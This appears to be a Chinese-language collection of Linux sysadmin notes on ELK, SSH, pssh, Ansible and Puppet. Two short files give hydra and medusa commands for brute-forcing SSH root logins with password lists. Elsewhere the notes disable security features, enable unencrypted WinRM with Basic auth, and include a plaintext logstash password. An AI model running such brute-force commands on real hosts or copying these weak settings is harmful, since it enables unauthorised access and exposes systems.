51 | xpack.monitoring.elasticsearch.username: logstash_system
52 | xpack.monitoring.elasticsearch.password: Pn6*Xn+3vfF~3k952Msd
53 |
54 |
55 |
56 | **2、禁用x-pack**
57 | - Elasticsearch
58 |
59 | #vim /etc/elasticsearch/elasticsearch.yml
60 | xpack.security.enabled: false
61 | - Kibana
62 | #vim /etc/kibana/kibana.yml
63 |
64 | xpack.security.enabled: false
65 | - logstash
66 |
67 | #vim /etc/logstash/logstash.yml
68 | xpack.security.enabled: false
69 |
70 | ### 四、重启服务生效
71 | - Elasticsearch:`/etc/init.d/elasticsearch restart`
72 | - Kibana:`/etc/init.d/kibana restart`
73 | - logstash:`/etc/init.d/logstash restart`
74 |
75 |
76 |
77 |
--------------------------------------------------------------------------------
/chapter1/ri-zhi-fu-wu-qi-eflk-bu-shu/goaccess-ri-zhi-fen-xi.md:
--------------------------------------------------------------------------------
1 | #Goaccess 日志分析
2 |
3 |
4 | ###一、Goaccess 安装
5 | **1、配置epel 源**
6 |
7 | yum -y install epel-release
8 |
9 | **2、安装goaccess**
10 |
11 | yum -y install goaccess geoip-devel libmaxminddb-devel tokyocabinet-devel openssl-devel ncurses-devel
12 |
13 |
14 |
15 | ###二、Goaccess 使用
16 | **1、日志分析**
17 | #分析日志
18 | goaccess LOGFILE
19 |
20 | #实时分析
21 | goaccess LOGFILE -c
22 |
23 | #导出html
24 | goaccess LOGFILE -o report.html
25 |
26 | #导出csv
27 | goaccess LOGFILE -o csv > report.csv
28 |
29 | #导出json
30 | goaccess LOGFILE -o json > report.json
31 |
32 | #server实时监听
33 | goaccess LOGFILE -o report.html --real-time-html
34 |
35 | ###三、nginx2Goaccess 脚本使用
36 |
37 | **1、安装 nginx2Goaccess**
38 |
39 | git clone https://github.com/stockrt/nginx2goaccess.git
40 |
41 |
42 |
43 | **2、生成goaccess nginx 配置文件**
44 |
45 | nginx2goaccess.sh
46 |
47 |
--------------------------------------------------------------------------------
/chapter1/ri-zhi-fu-wu-qi-eflk-bu-shu/rsyslog-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/ri-zhi-fu-wu-qi-eflk-bu-shu/rsyslog-fu-wu.md
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/san-3001-ssh-fu-wu.md
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/pssh-shi-yong.md:
--------------------------------------------------------------------------------
1 | ###一、下载
2 |
3 | wget http://parallel-ssh.googlecode.com/files/pssh-2.3.1.tar.gz
4 | ###二、安装
5 |
6 | tar xf pssh-2.3.1.tar.gz
7 | cd pssh-2.3.1/
8 | python setup.py install
9 | ###三、安装结果
10 | 
11 | ###四、参数介绍
12 |
13 | pssh 参数:
14 | -h 执行命令的远程主机列表 文件内容格式:[user@]host[:port]
15 | -H 执行命令的远程主机
16 | -p 一次最大允许多少连接
17 | -o 输出结果重定向到目录
18 | -e 执行的错误重定向到目录
19 | -t 设置超时时间
20 | -A 提示输入密码并把密码传递给ssh
21 | -l 远程机器的用户名
22 | -x 传递多个SSH命令,多个命令用空格隔开,用引号括起来
23 | -X 同 -x 但是一次只能传递一个命令
24 | -i 显示标准输出和标准错误输出在每台HOST执行完毕后
25 | -I 读取每个输入命令,并传递给ssh进程,允许命令脚本传送到标准输入
26 |
27 | **例如:**
28 |
29 |
30 | 查看负载:
31 |
32 | 
33 |
34 |
35 |
36 | 手动输入密码:
37 |
38 | 
39 |
40 | pscp 参数: 拷贝本地文件到远程主机
41 | -h 执行命令的远程主机列表 文件内容格式:[user@]host[:port]
42 | -H 执行命令的远程主机
43 | -p 一次最大允许多少连接
44 | -o 输出结果重定向到目录
45 | -e 执行的错误重定向到目录
46 | -t 设置超时时间
47 | -A 提示输入密码并把密码传递给ssh
48 | -l 远程机器的用户名
49 | -x 传递多个SSH命令,多个命令用空格隔开,用引号括起来
50 | -X 同 -x 但是一次只能传递一个命令
51 |
52 | **例如:**
53 |
54 | 将本地 test.txt 拷贝到远程主机/home 目录下
55 | 
56 |
57 | Pslurp 参数:拷贝远程主机到本地
58 | 同上,
59 | -L 指定本地目录
60 | **例如:**
61 |
62 | 将远程主机下 /tmp 目录下的passwd 文件拷贝到本地, 改名为passwd (注:最后的改名必须要有,不想改名就使用原文件名即可)
63 | 
64 |
65 | **验证结果:**
66 |
67 | 
68 |
69 | Pnuke 参数: 远程杀进程
70 | 同上
71 |
72 | **注:(只能杀进程名,不能杀进程ID)**
73 | **建议使用:** `pssh -h hosts -P 'kill -9 进程名or 进程ID'`
74 |
75 | **Prsync 同 pscp 安装之后有问题。
76 | Pssh-askpass **
77 |
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/rsync-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/san-3001-ssh-fu-wu/rsync-fu-wu.md
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/ssh-agent-dai-li.md:
--------------------------------------------------------------------------------
1 | ###一、ssh-agent 用途
2 |
3 | 是一种控制用来保存公钥身份验证所使用的私钥的程序。ssh-agent在X会话或登录会话之初启动,所有其他窗口或程序则以客户端程序的身份启动并加入到ssh-agent程序中。通过使用环境变量,可定位代理并在登录到其他使用ssh机器上时使用代理自动进行身份验证。
4 |
5 | ###二、使用场景介绍
6 |
7 | 当你对一台机器生成了秘钥访问。秘钥有密码,这时候你使用密钥登陆,无论如何都要输入密码
8 |
9 | ssh-keygen -t rsa -P "123456"
10 | ssh-copy-id USER@IP
11 |
12 | ssh IP #这时会提醒输入密码
13 |
14 | **怎么解决:**
15 |
16 | 启动 ssh-agent
17 | ssh-agent bash
18 |
19 | ssh-add ~/.ssh/id_rsa
20 |
21 | 这时候在登录就不需要输入秘钥密码
22 | ###三、常用命令介绍
23 |
24 | **ssh-agent:**
25 |
26 | 启动:
27 | ssh-agent bash
28 | eval `ssh-agent`
29 | 关闭:
30 | ssh-agnet -k
31 | **ssh-add:**
32 |
33 | 添加秘钥:
34 | ssh-add FILE
35 | 查看秘钥:
36 | ssh-add -l
37 | 查看秘钥:
38 | ssh-add -L
39 | 删除秘钥:
40 | ssh-add -d
41 | 删除所有秘钥:
42 | ssh-add -D
43 |
44 |
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/ssh-bao-po-gong-5177-hydra.md:
--------------------------------------------------------------------------------
1 | ###一、安装
2 | **1、编译安装:**
3 |
4 |
5 | wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
6 | tar zxf hydra-6.3-src.tar.gz
7 | cd hydra-6.3-src
8 | ./configure
9 | make
10 | make install
11 | **2、yum安装**
12 |
13 | yum -y install hydra
14 | ###二、使用
15 |
16 | #pass.txt为爆破字典
17 |
18 | hydra 127.0.0.2 ssh -l root -P pass.txt
19 |
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/ssh-bao-po-gong-5177-medusa.md:
--------------------------------------------------------------------------------
1 | ###一、安装
2 | **1、编译安装**
3 |
4 | wget href="http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz">http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
5 | tar -zxvf medusa-2.1.1.tar.gz
6 | cd medusa-2.1.1
7 | ./configure
8 | make
9 | make install
10 |
11 | **2、yum安装**
12 |
13 | yum -y install medusa
14 | ###二、使用
15 |
16 | medusa -d #查看medua支持的模块
17 | medusa -H ip.txt -u root -P p.txt -M ssh
18 |
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/ssh-client-an-zhuang.md:
--------------------------------------------------------------------------------
1 | ###一、SSH 客户端安装
2 |
3 | yum -y install openssh-clients
4 |
5 | ###二、SSH 客户端配置
6 |
7 | - **全局配置文件:** `vim /etc/ssh/ssh_config`
8 |
9 | - **用户配置文件:** `vim ~/.ssh/config`
10 |
11 | Host 别名
12 | Hostname 主机名
13 | Port 端口
14 | User 用户名
15 |
16 | #会话复制
17 | ControlMaster auto
18 | ControlPath /tmp/ssh-%r@%h
19 |
20 | ###三、SSH 使用
21 |
22 | - **登录:**
23 |
24 | ssh USERNAME@IP
25 | - **远程执行命令:**
26 |
27 | ssh USERNAME@IP COMMAND
28 |
29 |
30 | - **拷贝文件:**
31 |
32 | scp FILE USERNAME@IP:/
33 | scp USERNAME@IP:/FILE FILE
34 |
35 | scp -r DIR USERNAME@IP:/
36 | scp USERNAME@IP:/DIR DIR
37 |
38 | - **免秘钥:**
39 |
40 | server:
41 | ssh-keygen -t rsa
42 | ssh-copy-id -I USERNAME@IP
43 |
44 | - **SSH 远程不询问YES:**
45 |
46 | ssh -o StrictHostKeyChecking=no
47 | - **远程比较文件:**
48 |
49 | ssh USERNAME@IP "cat FILE" | diff - FILE
50 |
51 | ###四、其他技巧
52 | - **远程挂载:**
53 |
54 | yum -y intall fuse-sshfs
55 | sshfs USERNAME@IP:DIR MOUNT-DIR
56 |
57 | - **远程明文密码链接:**
58 |
59 | yum -y install sshpass
60 | sshpass -p "password" ssh USERNAME@IP
61 |
62 | - **嵌套ssh:**
63 |
64 | ssh -t user@IP1 ssh user@IP2
65 |
66 | ###五、windows
67 |
68 | xshell putter 等等
69 | 使用方法略
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/ssh-forward.md:
--------------------------------------------------------------------------------
1 | ###一、本地local(ssh -NfL)
2 |
3 | - **穿透访问内网:**
4 |
5 | A 机器: 公网 1.1.1.1 内网 192.168.1.1
6 | B 机器: 公网 无 内网 192.168.1.2
7 |
8 | ssh -CfNL 192.168.1.1:222:192.168.1.2:22 1.1.1.1
9 |
10 | 将远程 192.168.1.1 的22端口映射到 192.168.1.2 的222端口
11 |
12 | - **翻墙访问google:**配置一台海外服务器用海外服务器去代理到google
13 |
14 | ssh -CfNL 10.0.2.212:80:www.google.com:80 10.0.2.212
15 |
16 | ###二、远程Remote(ssh -NfR)
17 |
18 | **将本地的端口在远程机上监听:**
19 |
20 | ssh -NfR 2000:10.0.2.211:3000 10.0.2.212
21 |
22 | 将本地10.0.2.211的3000端口在10.0.2.212 上监听2000
23 | #问题:监听在127.0.0.1 ,问题不详
24 |
25 | ###三、动态Dynamic(ssh -NfD)
26 |
27 | **动态socket代理**
28 |
29 | ssh -NfD 1234 IP
30 |
31 | 浏览器配置 代理为本机IP 的1234 端口,这时候访问站点变成了 远程IP 访问
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/ssh-mount-shi-yong.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/san-3001-ssh-fu-wu/ssh-mount-shi-yong.md
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/ssh-pass-shi-yong.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/san-3001-ssh-fu-wu/ssh-pass-shi-yong.md
--------------------------------------------------------------------------------
/chapter1/san-3001-ssh-fu-wu/ssh-serveran-zhuang.md:
--------------------------------------------------------------------------------
1 | ###一、安装SSH
2 |
3 | 通常情况下,安装系统,默认就安装上ssh-server 服务
4 |
5 | yum -y install openssh-server
6 |
7 | ###二、SSH 配置
8 |
9 | [root@nfs-node2 ~]# vim /etc/ssh/sshd_config
10 | ###注意: /etc/ssh/ssh_config 为客户端配置文件
11 |
12 | #定义端口
13 | 13 Port 22
14 |
15 | #关闭dns解析
16 | 122 UseDNS no
17 |
18 | #关闭GSSAPI 验证(通常使用 密码 或者 KEY 的验证方式)
19 | 80 GSSAPIAuthentication no
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 | ###三、配置防火墙允许访问dns服务
28 |
29 | [root@nfs-node2 ~]# iptables -I INPUT -p udp -m state --state NEW -m udp --dport 22 -j ACCEPT
30 | [root@nfs-node2 ~]# iptables -I INPUT -p udp -m state --state NEW -m tcp --dport 22 -j ACCEPT
31 |
32 | ###四、启动服务、开机自启动
33 |
34 | [root@nfs-node2 ~]# /etc/init.d/sshd start
35 | [root@nfs-node2 ~]# chkconfig sshd on
36 |
37 |
38 | ###五、SSH 配置详解
39 |
40 |
41 | Port 22 #默认端口
42 | ListenAddress IP #监听服务器端的IP,ss -ntl 查看22端口绑定的iP地址
43 | LoginGraceTime 2m #登录时不输入密码时超时时间
44 | HostKey # HostKey本地服务端的公钥路径
45 | UseDNS no #禁止将IP逆向解析为主机名,然后比对正向解析的结果,防止客户端欺骗
46 | PermitRootLogin yes #是否允许root使用SSH远程登录
47 | MaxAuthTries 6 #密码错误的次数6/2=3(MAN帮助中写明要除2)次后断开连接
48 | MaxSessions 10 #最大的会话连接数(连接未登录的会话最大值,默认拒绝旧的连接未登录的会话)
49 | StrictModes yes #检查用户家目录中ssh相关的配置文件是否正确
50 | PubkeyAuthentication yes #是否使用基于key验证登录
51 | AuthorizedKeysFile .ssh/authorized_keys #key验证登录的客户端公钥路径
52 | PasswordAuthentication yes #是否允许使用密码登录
53 | PermitEmptyPasswords no #用户使用空口令登录
54 | GatewayPorts no #启用网关功能,开启后可以将建立的SSH隧道(端口转发)共享出去
55 | ClientAliveCountMax 3 #探测3次客户端是否为空闲会话,↓3*10分钟后断开连接
56 | ClientAliveInterval 10 #空闲会话时长,每10分钟探测一次
57 | MaxStartups 10:30:100 #start:rate:full;当连接但为进行认证的用户超过10个,drop30%(rate/full)的连接当连接但未登录的连接达到100个后,新建立的连接将被拒绝
58 | Banner /path/file #认证前输出的登录提示信息,指定文件路径
59 | GSSAPIAuthentication no
60 | AllowUsers username #白名单,如果白名单有用户只有白名单的用户可以登陆
61 | DenyUsers #黑名单,被拒绝的用户,如果即允许又拒绝则拒绝生效
62 | AllowGroups #组白名单
63 | DenyGroups #组黑名单
64 |
65 | ###六、SSH 安全相关
66 |
67 | SSH也可能成为DOS攻击的对象,例如恶意用户连接SSH但不输入密码进行验证,由于设置了MaxStartups会导致正常用户无法进行登录。针对此情况建议:
68 |
69 | 修改默认端口
70 | MaxStartups 调大一些例如 MaxStartups 100:30:1000
71 | LoginGraceTime 10 调整连接超时未10秒
72 | MaxSessions 10 设置连接但未登录的用户最大值为10
73 |
74 | - 其他优化
75 |
76 |
77 | 限制可登录用户
78 | 设定空闲会话超时时长
79 | 充分利用防火墙设置ssh访问策略
80 | 仅监听指定IP的ssh
81 | 禁止使用空口令登录
82 | 禁止使用root直接进行登录
83 | 做好日志分析
84 | 加强用户登录的密码口令
85 |
86 |
87 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-3001-zi-dong-hua.md
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/ansible.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-3001-zi-dong-hua/ansible.md
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/ansible/2ansibleji-ben-shi-yong.md:
--------------------------------------------------------------------------------
1 | ###一、基本结构
2 |
3 | ansible #
4 | ansible-doc #查看帮助
5 | ansible-playbook #执行playbook
6 | ansible-pull #
7 | ansible-galaxy #
8 | ansible-vault #
9 |
10 | ###二、配置结构
11 |
12 | ansible.cfg #配置文件
13 | hosts #inventory配置文件
14 | role #角色目录
15 |
16 | 1、查看所有可以使用的模块 ansible-doc -l
17 | 2、产看某个模块的帮组 ansible-doc -s MODULE_NAME
18 |
19 | ###三、ansible命令应用基础
20 |
21 | 语法:ansible [-f forks] [-m module_name] [-a args]
22 | -f forks :启动的并发线程数
23 | -m module :要使用的模块
24 | -a args :模块特有的参数
25 | -k key :指定密码
26 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/ansible/33001-chang-jian-mo-kuai.md:
--------------------------------------------------------------------------------
1 | ###一、常见模块
2 |
3 | **1、command: **命令模块,默认模块,用于在远程主机执行命令(缺陷:执行命令不能使用变量和参数)
4 |
5 | 例: ansible all -a 'date'
6 | **2、cron:**
7 |
8 | state:
9 | present:安装
10 | absent:移除
11 | 例: 使用ansible 添加任务计划 */10 * * * * /bin/echo hello
12 | 添加:
13 | ansible all -m cron -a 'minute="*/10" job="/bin/echo hello" name="test job" state=present'
14 | 检查:
15 | ansible all -a 'crontab -l'
16 | 移除:
17 | ansible all -m cron -a 'minute="*/10" job="/bin/echo hello" name="test job" state=absent'
18 |
19 | **3、user:**
20 |
21 | name=:指定用户名
22 |
23 | 添加用户
24 | ansible all -m user -a 'name="user1" state=present'
25 |
26 | 删除用户
27 | ansible all -m user -a 'name="user1" state=absent'
28 | **4、group:**
29 |
30 | 添加用户组
31 | ansible all -m group -a 'name="mysql" gid=306 system=yes'
32 | **5、copy:**
33 |
34 | src= :定义本地源文件
35 | dest=:定义目标路劲(绝对路劲)
36 | content= :取代src=,表示用指定的内容生成为目标文件的内容,不能与src同时使用
37 | 拷贝本地的/etc/fstab 到远程的 /tmp 下权限为640 属主为root
38 | ansible all -m copy -a 'src=/etc/fstab /dest=/tmp/fstab.ansible owner=root mode=640'
39 |
40 | 拷贝内容为“hello longge”到远程主机
41 | ansible all -m copy -a 'content="hello longge" dest=/tmp/test.ansible'
42 |
43 | **6、file:**
44 |
45 | 设置文件属性
46 | ansible all -m file -a 'owner=mysql group=mysql mode=644 path=/tmp/fstab.ansible'
47 | 设置链接
48 | src: 源文件的路径
49 | path:表示符号链接的文件路径
50 | ansible all -m file -a 'src=/tmp/fstab.ansible path=/tmp/link state=link'
51 |
52 | **7、ping:**
53 |
54 | 测试远程主机的连通性
55 | ansible all -m ping
56 | **8、service:**
57 |
58 | 服务管理
59 | ansible all -m service -a 'enabled=true name=httpd state=started'
60 | **9、shell:**
61 |
62 | 与command 类似,可以执行带管道和变量的命令
63 | **10、script:**
64 |
65 | 将本地脚本在远程主机运行
66 | ansible all -m script -a '/tmp/test.sh'
67 | **11、yum:**
68 |
69 | 安装软件包
70 | ansible all -m yum -a 'name=zsh'
71 | 卸载
72 | ansible all -m yum -a 'name=zsh state=absent'
73 | **12、setup:**
74 |
75 | 收集远程主机的Facts(每个被管理节点在接收运行管理命令之前,会将自己主机相关信息,如操作系统,IP等信息传递给ansible主机)
76 | ansible all -m setup
77 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/ansible/4playbook-yaml.md:
--------------------------------------------------------------------------------
1 | **1、YAML介绍**
2 |
3 | YAML是一个可读性高的用来表达资料序列的格式。YAML参考了其他多种语言,包括:XML,C语言、Python、Perl以及电子邮件格式RFC2822等,
4 | Clark Evans在2001年首次发表了这种语言,另外ingy dot Net与Oren Ben-Kiki也是这语言的共同设计者
5 |
6 | YAML Ain t Markup Language,即yaml不是xml,
7 | 不过,在开发的这种语言时,YAML的意思是: Yet Anther Markup Language("仍是一种语言"),
8 | 其特性:
9 | YAML的可读性好
10 | YAML和脚本语言的交互性好
11 | YAML使用实现语言的数据类型
12 | YAML有一个一致性的信息模型
13 | YAML易于实现
14 | YAML可以基于流来处理
15 | YAML表达能力强,扩展性好
16 | 更多内容及规范参见:http://www.yaml.org
17 |
18 | **2、YAML语法**
19 |
20 | YAML的语法和其他高阶语言类似,并且可以简单表达清单、散列表、标量等数据结果,
21 | 其结构(Structure)通过空格来展示,序列(Sequence)里的项用“”来代表,map里的键值对用“:”分割。
22 | 实例{
23 | name: John Smith
24 | age: 41
25 | gender: Male
26 | spose:
27 | name: Jane Smith
28 | age:37
29 | gender: Female
30 | children:
31 | - name: Jimmy Smith
32 | age: 17
33 | gender: Male
34 | - name: Jenny Smith
35 | age: 13
36 | gender: Female
37 | YAML文件扩展名通常为".yaml" 例如:example.yaml
38 | }
39 | **3、list**
40 |
41 | 列表的所有元素均用“-” 打头
42 | 例如:
43 | # A list of tasty fruits
44 | - Apple
45 | - Orange
46 | - Strawberry
47 | - Mango
48 |
49 | **4、dictionary**
50 |
51 | 字典通过key 与value进行标识
52 | 例如:
53 | #An employee record
54 | name: Example Developer
55 | job: Developer
56 | skill: Elite
57 | 也可以将key:value放置于{}中进行表示,例如:
58 | ---
59 | #An employer record
60 | {name: Example Developer, job: Developer, skill: Elite}
61 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/ansible/6playbookde-zu-cheng-jie-gou.md:
--------------------------------------------------------------------------------
1 | ###一、playbook的组成结构
2 |
3 | 1、Invetory
4 | 2、Modules
5 | 3、Ad Hoc Commands
6 | 4、Playbooks
7 |
8 | Tasks:任务,即调用模块完成的某炒作
9 | Variables:变量
10 | Templates:模板
11 | Hadlers:处理器,由某时间触发执行的操作
12 | Roles:角色
13 |
14 | ###二、基本结构
15 |
16 | -hosts: weserver
17 | remote_uesr: root
18 | tasks:
19 | - task1
20 | modulename: module_args
21 | - task2
22 | modulename: module_args
23 |
24 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/ansible/ansible-windows.md:
--------------------------------------------------------------------------------
1 | # Ansible 批量控制windows #
2 |
3 | ### 一、Ansible控制端安装 ###
4 | **1、安装ansible**
5 |
6 | yum -y install ansible
7 |
8 | **2、安装windows控制依赖包**
9 |
10 | yum -y install python-pip
11 | pip install "pywinrm>=0.2.2"
12 | yum -y install python-devel krb5-devel krb5-libs krb5-workstation
13 |
14 | ### 二、安装windows 依赖包 ###
15 | **1、安装.NET 4.5(最低3.0)**
16 | **2、修改注册表 **
17 |
18 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft\PowerShell\1\ShellIds\ScriptedDiagnotics
19 |
20 | ExecutionPolicy 修改为 remotesigned
21 |
22 |
23 | **3、安装powershell3.0**
24 | **4、调整网络为家庭网络**
25 | **5、管理员启动powershell**
26 |
27 | - winrm qc
28 | - winrm set winrm/config/service '@{AllowUnencrypted="true"}'
29 | - winrm set winrm/config/service/auth '@{Basic="true"}'
30 |
31 |
32 | ### 三、使用批量操作 ###
33 | **1、ansile-server 机器配置ip**
34 |
35 | vim /etc/ansible/hosts
36 | [windows]
37 | 10.0.0.216
38 | [windows:vars]
39 | ansible_ssh_user="work"
40 | ansible_ssh_pass="123456"
41 | ansible_ssh_port=5985
42 | ansible_connection="winrm"
43 |
44 | #测试网络连通性
45 | ansible windows -m win_ping
46 | **2、其他操作**
47 | - **上传文件:**
48 |
49 | ansile windows -m win_copy -a "src=/etc/passwd dest=c:\passwd"
50 | - **删除文件:**
51 |
52 | ansible windows -m win_file -a "dest=c:\passwd state=absent"
53 |
54 | - **创建用户:**
55 |
56 | ansible windows -m win_user -a "name=demo passwd=123456"
57 |
58 | - **执行命令:**
59 |
60 | ansible windows -m win_shell -a "echo hello,world"
61 |
62 | - **下载文件:**
63 |
64 | ansible windows -m win_get_url -a "dest=c:/123.html url=http://www.baidu.com"
65 |
66 |
67 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/ansible/ansiblean-zhuang.md:
--------------------------------------------------------------------------------
1 | ###一、 配置epel源
2 |
3 | yum installparamiko PyYAML jinja2 httplib2 #安装环境依赖包
4 | yum info ansible #查看ansible安装包详细信息
5 | yum -y install ansible #前提安装epel源
6 | ###二、客户端免秘钥:
7 |
8 | ssh-keygen -t rsa #生成秘钥
9 | ssh-copy-id -i /root/.ssh/id_rsa.pub USER@IP #拷贝秘钥到远程主机
10 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/ansible/bao-cuo-xin-xi-chu-li.md:
--------------------------------------------------------------------------------
1 | ###一、报错
2 | **1、出现Error: **
3 |
4 | ansible requires a json module, none found!
5 | SSH password:
6 | 192.168.56.80 | FAILED >> {
7 | "failed": true,
8 | "msg": "Error: ansible requires a json module, nonefound!",
9 | "parsed": false
10 | }
11 |
12 | **解决:**python版本过低,要不升级python要不就安装python-simplejson
13 | **2、安装完成后连接客户端服务器报错:**
14 |
15 | FAILED => Using a SSH password insteadof a key is not possible because Host Key checking is enabled and sshpass doesnot support this. Please add this host'sfingerprint to your known_hosts file to manage this host.
16 |
17 | **解决:**在ansible 服务器上使用ssh 登陆下/etc/ansible/hosts 里面配置的服务器。然后再次使用ansible 去管理就不会报上面的错误了!但这样大批量登陆就麻烦来。因为默认ansible是使用key验证的,如果使用密码登陆的服务器,使用ansible的话,要不修改ansible.cfg配置文件的ask_pass = True给取消注释,要不就在运行命令时候加上-k,这个意思是-k, --ask-pass ask for SSH password。再修改:host_key_checking= False即可
18 |
19 | **3、如果客户端不在know_hosts里将会报错**
20 |
21 | paramiko: The authenticity of host '192.168.56.80'can't be established.
22 | The ssh-rsa key fingerprint is397c139fd4b0d763fcffaee346a4bf6b.
23 | Are you sure you want to continueconnecting (yes/no)?
24 | 解决:需要修改ansible.cfg的#host_key_checking= False取消注释
25 |
26 | **4、出现FAILED => FAILED: not a valid DSA private key file**
27 |
28 | **解决:**需要你在最后添加参数-k
29 |
30 | **5、openssh升级后无法登录报错**
31 |
32 | PAM unable todlopen(/lib64/security/pam_stack.so): /lib64/security/pam_stack.so: cannot openshared object
33 | file: No such file or directory
34 |
35 | **解决:**sshrpm 升级后会修改/etc/pam.d/sshd 文件。需要升级前备份此文件最后还原即可登录。
36 |
37 | **6、pip安装完成后,运行ansible报错:**
38 |
39 | File "/usr/lib64/python2.6/subprocess.py",line 642, in __init__ errread, errwrite)
40 | 解决:安装:yum installopenssh-clients
41 |
42 | **7、第一次系统初始化运行生成本机ansible用户key时报错**
43 |
44 | failed: [127.0.0.1] =>{"checksum": "f5f2f20fc0774be961fffb951a50023e31abe920","failed": true}
45 | msg: Aborting, target uses selinux but pythonbindings (libselinux-python) aren't installed!
46 | FATAL: all hosts have already failed –aborting
47 |
48 | **解决:**# yuminstall libselinux-python -y
49 | 注意这个是在 host机器上安装,不是在ansible控制机器上。
50 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/fabric.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-3001-zi-dong-hua/fabric.md
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-3001-zi-dong-hua/puppet.md
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/cuo-wu.md:
--------------------------------------------------------------------------------
1 | ###一、openssl报错
2 | 
3 |
4 | **处理方法:** `yum -y openssl-devel openssl` #配置主机名
5 |
6 | **客户端清理 key **
7 |
8 | cd /var/lib/pupet/ssl/ && rm -rf *
9 | /etc/init.d/puppet
10 |
11 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/puppet-dashboardan-zhuang.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-3001-zi-dong-hua/puppet/puppet-dashboardan-zhuang.md
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/puppet-service-guan-li.md:
--------------------------------------------------------------------------------
1 | ###一、启动一个服务
2 | service{'nginx':
3 | ensure => true,
4 | enable => true,
5 | }
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/puppetan-zhuang.md:
--------------------------------------------------------------------------------
1 | ###一、server端安装
2 |
3 | **1、安装puppet yum源**
4 |
5 | yum -y install http://yum.puppetlabs.com/el/6/products/x86_64/puppetlabs-release-6-7.noarch.rpm
6 | sed -i -e "s/enabled=1/enabled=0/g" /etc/yum.repos.d/puppetlabs.repo
7 | yum --enablerepo=puppetlabs-products,puppetlabs-deps -y install puppet-server
8 |
9 | **2、修改配置**
10 |
11 | vim /etc/sysconfig/puppetmaster
12 | PUPPETMASTER_MANIFEST=/etc/puppet/manifests/site.pp #打开注释
13 | PUPPETMASTER_LOG=syslog #记录日志
14 | touch /etc/puppet/manifests/site.pp #创建文件
15 |
16 | **3、启动服务、开机启动**
17 |
18 | /etc/rc.d/init.d/puppetmaster start
19 | chkconfig puppetmaster on
20 |
21 | ###二、client安装
22 |
23 | **1、安装puppet yum 源**
24 |
25 | yum -y install http://yum.puppetlabs.com/el/6/products/x86_64/puppetlabs-release-6-7.noarch.rpm
26 | sed -i -e "s/enabled=1/enabled=0/g" /etc/yum.repos.d/puppetlabs.repo
27 | yum --enablerepo=puppetlabs-products,puppetlabs-deps -y install puppet
28 |
29 | **2、修改配置**
30 |
31 | vi /etc/sysconfig/puppet
32 | PUPPET_SERVER=server.puppet.com #指定server端
33 | PUPPET_LOG=/var/log/puppet/puppet.log #记录日志
34 | **3、启动服务、开机启动**
35 |
36 | /etc/rc.d/init.d/puppet start
37 | chkconfig puppet on
38 |
39 | ###三、注册
40 | **Server 端:**
41 |
42 | puppet cert list # 查看注册信息
43 | puppet cert sign client1.puppet.com # 同意注册
44 | ###四、测试
45 | **server端:**
46 |
47 | vim /etc/puppet/manifests/site.pp #编辑主机配置文件
48 |
49 | group { 'testgroup':
50 | ensure => present,
51 | gid => 2000,
52 | }
53 | puppet apply /etc/puppet/manifests/site.pp #运行主配置文件
54 | **client端:**
55 |
